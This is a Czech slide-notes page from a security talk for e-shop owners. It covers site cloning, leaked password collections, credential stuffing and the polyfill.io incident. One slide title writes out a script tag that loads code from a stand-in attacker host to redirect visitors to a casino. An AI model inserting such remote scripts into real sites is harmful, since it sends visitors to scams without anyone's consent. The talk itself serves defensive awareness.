Podívejte se raději na online verzi přednášky, slajdy mohly být aktualizovány nebo doplněny.

Detail přednášky

Tohle je Internet a na něm se bezpečnost týká i malých a menších webů a shopů. A navíc Internet propojuje, takže problémy jednoho se vzápětí dotknou i druhého a obráceně. Mám pro to data a příklady a rád je ukážu. Zkusím zbořit to ohrané klišé „my jsme malí, nás nikdo hackovat nebude“.

Datum a akce

24. září 2024, GoPay Webinář (délka přednášky 20 minut, 17 slajdů, video)

Slajdy

Na velikost eshopu nezáleží

#1 Hackují se i malé weby a eshopy a i z nich unikají data. Fakt, opravdu.

Česko jako malá země

#2 Často slyším „my jsme malá firma, my nikoho nezajímáme“. Možná ten špatný odhad vychází i z nějakého zakořeněného názoru, že Česká republika je nějaká malá zemička. Ne Zemi je cca 250 států, když počítáme různá teritoria jako státy, nebo cca 200 pokud nepočítáme, nicméně tak i tak jsme v první polovině dle počtu obyvatel., dle HDP dokonce v první třetině. V EU jsme 9. dle počtu obyvatel z 27. Nejsme malá země.

Galaxy brain

#3 Seznam států dle velikosti mozku nejspíš neexistuje, ale je zcela jisté, že i na našem Internetu se vyskytují tvorové s tím pověstným galaxy brainem.

Amici Pizza & Burgers

#4 Nedávno jsem viděl nezvyklý útok na zákazníky brněnské pizzerie Amici: někdo si zaregistroval doménu mala-amicii.com, spustil na ni kopii té opravdové pizzerie a zaplatil si reklamu na Googlu (tu jsem si bohužel nestihl „vyfotit“). Ten někdo vytvořil v podstatě „reverzní proxy“ server, kdy všechna data pocházela z toho opravdového webu, ale jakmile mělo dojít na platbu, tak platební bránu nahradil svou, což způsobilo, že peníze za objednávku nedostali amíci, ale nejspíš nějaký úplně jiný národ.

Úniky hesel v médiích

#5 Podobné „drobnosti“ se ale do médií nedostávají, tam jsou jen ty „rekordní“.

Collection #1

#6 Ty rekordní úniky se ale často skládají z mnoha menších. To je případ tzv. „combo“ nebo „collection“ databází. V nich jsou pak úniky z různých dalších webů často pěkně zařazeny do kategorií jako gaming, shopping, streaming, stepmoming atd., někdy jsou tam uvedené i adresy, odkud únik pochází.

Menší české weby v Collection #1

#7 To byl případ i „combo“ databáze, která se jmenuje Collection #1. Před několika lety jsem ji (a další podobné) zkoumal a zveřejnil české a slovenské weby, které obsahovala. V odkazovaném článku najdete jejich celý seznam, na obrázku jsem vypsal jen ty menší. Data a hesla unikají i z menších webů a eshopů, protože i těch pár set hesel se může někomu hodit. Koruna ke koruně…

Útočníci mají k dispozici

#8závěru článku píšu, že když se dají dohromady 2 takovéto „combo“ databáze, tak „útočníci mají k dispozici 6,2 milionu unikátních e-mailových adres s koncovkou .cz a hesel“. A že to na tuhle malou zemičku není špatný (protože někdo ty klišé a stereotypy musí podporovat, že).

Mallér

#9 A to v té statistice není započítán jeden takový malér z roku 2017, zkrátka v těch kolekcích z nějakého důvodu není – asi tihle mizerové neznali Ulož.to, kde se tenhle malér dal stáhnout.

V úniku z Mallu je přes tři čtvrtě milionu jmen a hesel

#10 Tenkrát šlo stáhnout 750k hesel v čitelné podobě, tel. čísla apod. Tohle je doposud jeden z těch asi největších CZ úniků, ale v tom výše zmíněném počtu 6,2M unikátních údajů to zas není tak velké sousto.

Podvodníci zneužili účty zákazníků Alzy

#11 Útočníci to všechno (nejen únik z Mallu) začali samozřejmě používat pro svou zábavu a hlavně své obohacení. Na jaře 2018 se začalo se šířit, že někdo údajně hacknul Alzu. Ale to jen „podvodníci zneužili účty zákazníků“, nedošlo k úniku z Alzy.

K úniku údajů došlo podle všeho mimo Alzu

#12 Alza to prozkoumala a zjistila, že k úniku údajů došlo podle všeho mimo Alzu. Přeloženo do češtiny: někdo si na Internetu sehnal nějaké ty databáze a údaje v nich uvedené začal používat pro přihlášení do Alzy. Vzhledem k tomu, že nemálo lidí používá jedno heslo pro více služeb, nebo mají jedno heslo pro eshopy, druhé pro netflixy, třetí pro bankovnictví (což vyjde skoro nastejno), tak se to útočníkům často povedlo. Část zákazníků má na Alze uloženou i platební kartu, takže šlo nakupovat z cizího. Alza poškozeným bez keců vrátila peníze, čímž z toho udělala menší kauzu, než jaký to mělo potenciál, což bylo super nejen pro Alzu. Všimněte si, jak je to všechno propojený, problém v jednom eshopu zavaří i druhýmu, a obráceně. Je to jeden ekosystém, na řešení problémů je potřeba spolupráce.

Používáte různá hesla pro více svých účtů? Ano: 85,8 %

#13 Na konci toho článku je anketa s pozoruhodnými výsledky. Buďto hlasovali všichni moji kamarádi, ale že by jich tolik četlo Novinky? Není možný. Tak možná to lidi pochopili blbě, mají dvě hesla na stopadesát účtů a to už tu otázku splní. Totál unikátní hesla, tedy bezpečná hesla uložená nejlépe ve správci hesel, používá cca 10–20 % lidí, záleží na službě, ale určitě ne 85. Kdyby to bylo 85 %, tak by nejspíš ani nevznikl tenhle článek, ve kterým je ta anketa, protože by problém neexistoval. Používejte správce hesel a unikátní hesla, je to důležitější, než jestli máte v heslu velké písmeno (když už jsme u těch velikostí, na kterých nezáleží), speciální znak nebo název dinosaura. Když to heslo pak použijete na více místech a odněkud unikne, tak je to stejně jedno co obsahuje. Pomocí Have I Been Pwned? si můžete zkontrolovat jestli vaše e-mailová adresa je v nějakém známém úniku, podobnou kontrolu dělají i správci hesel a prohlížeče.

Hledám a nacházím chyby, které by mohly vést k únikům

#14 Úniky se týkají, resp. mohly by se týkat i dalších větších i menších firem, o kterých by se možná taky psalo. Hledám chyby, ale nezneužívám je a nepřistupuji k údajům jiných uživatelů (počet záznamů se dá spočítat pomocí SELECT COUNT(*)). Chyby hlásím nehledě na velikost shopu. Tohle je např. jedna z nich, která začala jako chyba na jednom menším shopu, ale nakonec se ukázalo, že ta králičí nora je docela hluboká a týká se celé platformy. Kdyby někdo zneužil chyby, které jsem za posledních pár let našel a nahlásil, tak uniknou i vaše data. A to nejspíš ne jenom jednou.

<script src="https://attacker/redirect-to-casino.js">

#15 Mizerové používají uniklá hesla i k dalším nepěknostem. Třeba se přihlásí do administrace nějakého eshopu menšího i většího, jim je to jedno, a přidají svůj JavaScript, který návštěvníky z Googlu posílá na nějaké kasino, stránky s nabídkou iPhonu „zdarma“ apod. Protože je (naštěstí) nenapadne nic jiného, viz ta velikost (non-)galaxy brainu.

<script src="https://cdn.polyfill.io/...">

#16 Občas si zábavu zatáhnou do stránek ale i sami tvůrci, třeba když použijí JavaScript třetí strany. To byl i nedávný případ kódu z domény polyfill.io, což je JavaScriptová knihovna, která do starších browserů dodává novější funkce a dost se používala (dnes už není třeba). Tu doménu koupila jakási čínská firma a pak se „něco“ stalo a najednou začal Google webům odmítat reklamu, že prý stránky přesměrovávají uživatele jinam (další info o problému v češtině a v angličtině). No a tím jsem vás přivedl na velmi krásný oslí můstek, po kterém když jste přešli, tak jste se ocitli na následující přednášce od Lukáše z MasterCardu o nástrojích RiskRecon a My Cyber Risk.

Budoucnost je...

#17 Budoucnost je růžová. Možná by bylo lepší spíš jen: budoucnost je. Tečka. Jestli vás zajímá jaká teda bude, sledujte mě na Twitteru/X, Facebooku, LinkedInu, Mastodonu. Dík a nashle v nějakém úniku!

Video záznam

Video záznam

YouTube

Michal Špaček

Michal Špaček

Vyvíjím webové aplikace, zajímá mě jejich bezpečnost. Nebojím se o tom mluvit veřejně, hledám hranice tak, že je posouvám. Chci naučit webové vývojáře stavět bezpečnější a výkonnější weby a aplikace.

Veřejná školení

Zvu vás na následující školení, která pořádám a vedu: